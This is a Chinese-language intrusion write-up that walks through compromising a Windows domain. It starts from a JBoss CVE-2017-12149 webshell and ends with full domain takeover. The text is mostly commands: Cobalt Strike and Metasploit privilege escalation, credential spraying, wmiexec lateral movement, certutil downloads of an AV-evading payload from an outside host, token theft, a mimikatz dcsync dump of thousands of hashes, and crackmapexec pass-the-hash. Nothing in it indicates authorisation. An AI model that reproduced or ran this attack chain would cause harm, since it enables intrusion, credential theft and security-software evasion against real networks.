前言
首先是发现了一个 CVE-2017-12149:
访问 http://inbug.org:9090/status 发现有日志,已经被上传了 webshell:
那么就用别人的把:http://inbug.org:9090/jexws4/jexws4.jsp?ppp=whoami
通过 powershell 上线到 Cs:
发现有几百个补丁提权无果:
Metasploit 特权提权
随后把 CS 的 Beacon 互传到了 MSF:
MSF:
然后通过 MSF 的提权检测找到了几个 exp :
run post/multi/recon/local_exploit_suggester
然后利用模块尝试提权:
exploit/windows/local/bypassuac_sdclt
发现用户身份没变,但是当前特权变了:
直接 getsystem 提权到 SYSTEM:
最后利用 SYSYEM 把 shell 传到 Cs:
MSF:
当前权限就可以抓密码了:
既然当前 beacon 不是 SYSYEM,而且有了本地管理员的账号hash和明文 ,直接本地 psexec 利用本地 administrator 的密码上线:
内网横向移动
这个时候发现就是一个 SYSTEM 的 Beacon 会话了!但是发现没有域管的进程,结果只能另寻他路!然后用抓到的密码去喷射域内其他主机:
然后可以横向 wmi:
proxychains python3 wmiexec.py -shell-type cmd administrator:password@10.226.0.108 -codec gbk
Bypass 诺顿 AV 上线到 CobaltStrike
之后发现 10.226.0.156 有一个域管的进程:tasklist /v
然后还有诺顿 AV:
使用InScan 的ShllCode免杀功能 做了一下免杀
然后让目标下载我们的 exe,通过certutil 下载我们的 exe:
certutil.exe -urlcache -split -f http://inbug.org:80/download/main.exe
然后运行发现有问题:
exe 编码成 txt:
certutil -encode main.exe main.txt
然后目标下载 txt 然后解码再运行:
certutil.exe -urlcache -split -f http://inbug.org:80/download/main.txt
直接上线到 Cs:
先 getsystem 提权到 SYSYEM:
令牌窃取拿到域管
窃取域管的进程:
随后查询域控IP:
beacon> shell net group "Domain Controllers" /domain
最后直接 dcsync dump 域内全部 hash:
mimikatz lsadump::dcsync /domain:psnet.com /all /csv
5000 多个域用户的 hash 都拿到了,可以进行 pth,随后只要 administrator 的 hash,就可以指定:
mimikatz lsadump::dcsync /domain:inbug.org /user:Administrator
此时利用 ntlm hash 批量 pth 执行命令:
proxychains crackmapexec smb 192.168.0.0/24 -u administrator -H 4a03985f63e4dxxxxxxx -d inbug.org -x "net user"
此时游戏已经结束了!查看了一下域内进行信息;
execute-assembly /Users/saulgoodman/Downloads/SharpHound.exe -c all
好家伙,2600多机器,5000多个用户,就到这吧。